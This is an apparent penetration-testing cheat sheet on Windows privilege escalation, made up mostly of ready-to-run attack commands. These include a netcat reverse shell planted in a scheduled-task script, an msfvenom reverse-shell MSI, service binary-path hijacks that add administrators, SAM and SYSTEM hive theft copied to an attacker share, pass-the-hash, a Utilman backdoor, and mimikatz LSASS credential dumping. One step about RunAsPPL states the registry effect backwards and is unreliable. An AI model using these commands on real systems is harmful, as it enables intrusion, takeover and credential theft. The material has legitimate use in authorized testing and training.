killchain-compendium/post exploitation/priv_esc/docs/windows/windows_priv_esc.md

Windows Privilege Escalation

Links

• Fundamentals
• PowerShellEmpire
• JAWS
• winpeas
• privescheck
• windows exploit suggester
• hacktricks

Account Types

• Administrator local & domain
• Standard local & domain
• Guest
• System, local system, final escalation
• Local Service, got anonymous connections over network.
• Network Service, default service account, authentication via network

Enumeration

Users & Groups

whoami /priv
net users
net users <username>
net localgroup
net localgroup <groupname>
query session
qwinsta

Files

• powershell

System

hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

• Installed software, check for existing exploits

wmic product get name,version,vendor

• Services

wmic service list brief | findstr  "Running"

Logfiles and Registry

cmdkey /list

• Keys containing passwords

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

AD Credentials

• Check AD's NTDS, SYSVOL
• Check user description of AD users

Get-ADUser -Filter * -Properties * | select Name,SamAccountName,Description

Exploit

• Use found credentials

runas /savecred /user:<domain\user> reverse_shell.exe

DLL Hijacking

• DLL hijacking

Unquoted Service Path

• unquoted service path

Token Impersonation

• SeImpersonatePrivilege is necessary, check via whoami priv
• Hot Potato is best before Server 2019 and Windows 10 (version 1809)
• Potatos
• itm4n

Schedules Tasks

• schtasks and schtasks /query /tn %TASK_NAME% /fo list /v
• Autoruns64.exe

MSI Elevated Installer

• Always install elevated

accesschk64 Permissions

• Check access to files and folders

accesschk64 -wvu "file.exe"

• If permission SERVICE_CHANGE_CONFIG is set

 sc config <service> binpath="net localgroup administrators user /add"

• Service escalation
• Any other binary works as well. Copy the compiled portable executable from the service_escalation onto the binary path.Restart the service afterwards.

accesschk64 for Services

accesschk64 -qlc "service.exe"

• If permission SERVICE_ALL_ACCESS is set it is configurable upload a reverse shell

icacls C:\Windows\Temp\shell.exe /grant Everyone:F

• Reconfigure and restart service

sc config TheService binPath= "C:\Path\to\shell.exe" obj= LocalSystem
sc stop TheService
sc start TheService

Startup Application

• Put reverse shell instead of an executable inside C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

Password Mining

• Set up metasploit

use auxiliary/server/capture/http_basic
set srvport 7777
set uripath pass

• Visit site on target

Unattended Windows Installation

• Investigate the following paths to potentially find user credentials

C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

• Watch out for the <Credentials> tags

Powershell History file

Get-Content %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Internet Information Services (IIS)

• Default web server on windows
• Paths containing credentials are the following

C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

Putty

• Saved proxy password credentials may be found via

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "ProxyPassword" /s

schtask and icacls

• Check schtasks /query /tn %TASK_NAME% /fo list /v
• Check script for scheduled tasks, F means full access

icacls <PathToScript>

• Put payload inside the script

echo "C:\tmp\nc.exe -e cmd.exe %ATTACKER_IP% 4711" > <PathToSript>

• Run the task

schtasks /run /tn <taskname>

Always Installs Elevated

• These should be set

C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

• Craft *.msi file with a payload

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f msi -o wizard.msi

• Upload and execute via

msiexec /quiet /qn /i C:\Windows\Temp\wizard.msi

Service Misconfiguration

• Check services, watch out for BINARY_PATH_NAME and SERVICE_START_NAME

sc qc apphostsvc

• Check found permissions via

icacls <BINARY_PATH_NAME>

• If the service binary path is writeable move the payload to its path and grant permissions

icacls <Payload_Service.exe> /grant Everyone:F

sc stop <service>
sc start <service>

• Catch the reverse shell service

Others ways are:

• Discretionary Access Control (DACL) can be opened via right click on the service and go to properties
• All services are stored under HKLM\SYSTEM\CurrentControlSet\Services\

Unquoted Service Path

• If BINARY_PATH_NAME spaces are escaped incorrectly. Its path will be resolved to every space from left to right. If there is a binary with a matching name inside the directory it will be started.
• A created directory at install time inherits the permissions from its parent. Check it via

icacls <directory>

• Use service-exe payload in msfvenom upload the payload and move it on the path with the a fitting parital name of the service path
• Set permissions

icacls C:\Path/to/service.exe /grant Everyone:F

Permissions

• priv2admin
• whoami /priv

SeBackup / Restore

• If SeBackup / SeRestore (rw on all files) is set an elevated cmd.exe may be opened
• Download SAM and System hashes

reg save hklm\system C:\Windows\Temp\system.hive
reg save hklm\sam    C:\Windows\Temp\sam.hive

• or

copy C:\Windows\System32\config\sam \\ATTACKER_IP\

• Start smb server on attack machine

copy C:\Windows\Temp\sam.hive \\ATTACKER_IP\
copy C:\Windows\Temp\system.hive \\ATTACKER_IP\

• Dump the hashes

secretsdump.py -sam sam.hive -system system.hive LOCAL

• or meterpreter on target

hashdump

• Use pass the hash to login

psexec.py -hashes <hash> administrator@$TARGET_IP

SeTakeOwnership

• If SeTakeOwnership is set one can take ownership of every file or service.

takeown /f C:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant <user>:F
copy cmd.exe utilman.exe

• Log out, on the Login screen click on Ease of Access

SeImpersonate / SeAssignPrimaryToken

• It is a rouge potato
• Execute process as another user
• Service accounts operate through impersonation
• Check privileges via whoami /priv for these
• Object Exporter Identifier (OXID) is executed as via DCOM as a resolver on port 135 to socket of attacker

socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234

• Catch the potatoe executable from target via netcat

Volume Shadow Copy Service

• Take a look at the volumes at

vssadmin list shadows

• Copy sam and system from the shadow copy

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\

Dump LSASS

• If administrator permissions are gained, a dump file can be created by opening the task manager and right clicking lsass.exe -> creat dumpfile

• Use procdump.exe from sysinternal suite as an alternative to tskmgr.exe

• Extract the dump via mimikatz

privilege::debug
sekurlsa::logonpasswords

LSASS Protection

• If the dump cannot be created because it is protected change RunAsPPL DWORD to 1 under

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa

• Alternatively use mimikatz

!+
!processprotect /process:lsass.exe /remove

Windows Credential Manager

• Can be found via Control Pane -> User Accounts -> Credential Manager
• Alternatively, command line can be used

vaultcmd /list
vaultcmd /listproperties:"Web Credentials"
vaultcmd /listcreds:"web credentials"

• Extract the password via powershell script Get-WebCredentials from nishang

powershell -ex bypass
Get-WebCredentials

• Via mimikatz if administrative permissions have been gained

privilege::debug
sekurlsa::credman